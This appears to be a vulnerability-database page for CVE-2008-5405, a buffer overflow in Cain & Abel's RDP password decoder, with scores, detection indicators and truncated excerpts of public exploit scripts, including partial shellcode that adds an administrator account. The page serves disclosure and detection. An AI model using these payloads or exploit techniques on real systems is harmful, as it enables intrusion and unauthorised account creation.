CVE-2008-5405
published 2008-12-10CVE-2008-5405: Stack-based buffer overflow in the RDP protocol password decoder in Cain & Abel 4.9.23 and 4.9.24, and possibly earlier, allows remote attackers to execute…
PriorityP262critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
46.98%
98.7th percentile
Stack-based buffer overflow in the RDP protocol password decoder in Cain & Abel 4.9.23 and 4.9.24, and possibly earlier, allows remote attackers to execute arbitrary code via an RDP file containing a long string.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oxid | cain_and_abel | — | — |
| oxid | cain_and_abel | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46\xcd\x10\x60
- →The exploit overwrites EIP at offset 8206 with a return address, followed by payload. A pattern of 8206 bytes of repeated characters before a 4-byte return address in an .rdp file is a strong indicator of exploitation. ↗
- →The Metasploit module uses AlphanumMixed encoding with bad chars \x00\x0a\x0d\x3c\x22\x3e\x3d; encoded shellcode in .rdp files will be alphanumeric mixed-case. ↗
- →The win32_adduser shellcode in exploit 7329 creates a local user account (USER=user, PASS=pass). Post-exploitation indicator: unexpected local account 'user' created after Cain .rdp file processing. ↗
- ·Return addresses (ROP gadgets) are platform-specific; the three targets cover Windows XP SP0/1/2 English and SP2 Spanish only. Exploitation on other OS versions or service packs requires different return addresses. ↗
- ·The vulnerability requires user interaction: the victim must manually open the crafted .rdp file via Cain's Tools -> Remote Desktop Password Decoder menu. It is not a remote network-exploitable vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2008-5405 Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
---
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Cain & Abel %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek ' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '20
Exploit-DB
Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow
exploitdb·2008-12-03
CVE-2008-5405 Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow
Cain & Abel 4.9.23 - '.rdp' Local Buffer Overflow
---
#exploit.py
print ""
print " !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""
# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232
Encoder=PexFnstenvSub http://metasploit.com
shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73
Exploit-DB
Cain & Abel 4.9.24 - '.rdp' Local Stack Overflow
exploitdb·2008-11-30
CVE-2008-5405 Cain & Abel 4.9.24 - '.rdp' Local Stack Overflow
Cain & Abel 4.9.24 - '.rdp' Local Stack Overflow
---
#!/usr/bin/perl
#
# Cain & Abel s.rdp");
print $rdp $overflow.$eip.$addr.$overflow2.$shellcode;
close($rdp);
# milw0rm.com [2008-11-30]
Exploit-DB
Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)
exploitdb·2008-11-30
CVE-2008-5405 Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)
Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)
---
# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also affected)
# By:Encrypt3d.M!nd
# encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
# Description:
# When Using Remote Desktop Password Decoder in Cain and
# Importing ".rdp" file contains long Chars(ex:8250 chars)
# The Program Will crash.And The Following Happen:
#
# EAX:41414141 ECX:7C832648 EDX:41414142 EBX:00000000
# ESP:0012BCD4 EBP:0012BCD4 ESI:001F07A8 EDI:00000001
# EIP:7E43C201 USER32.7E43C201
#
# Access violation When Reading [41414141]
#
# And Also The Pointer to next SEH record and SE Handler
Metasploit
Cain and Abel RDP Buffer Overflow
metasploit
Cain and Abel RDP Buffer Overflow
Cain and Abel RDP Buffer Overflow
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24 and below. An attacker must send the file to victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
No writeups or analysis indexed.
http://osvdb.org/50342http://oxid.netsons.org/phpBB2/viewtopic.php?t=2750http://secunia.com/advisories/32794http://securityreason.com/securityalert/4703http://www.securityfocus.com/bid/32543http://www.vupen.com/english/advisories/2008/3286https://exchange.xforce.ibmcloud.com/vulnerabilities/46940https://www.exploit-db.com/exploits/7297https://www.exploit-db.com/exploits/7309http://osvdb.org/50342http://oxid.netsons.org/phpBB2/viewtopic.php?t=2750http://secunia.com/advisories/32794http://securityreason.com/securityalert/4703http://www.securityfocus.com/bid/32543http://www.vupen.com/english/advisories/2008/3286https://exchange.xforce.ibmcloud.com/vulnerabilities/46940https://www.exploit-db.com/exploits/7297https://www.exploit-db.com/exploits/7309
2008-12-10
Published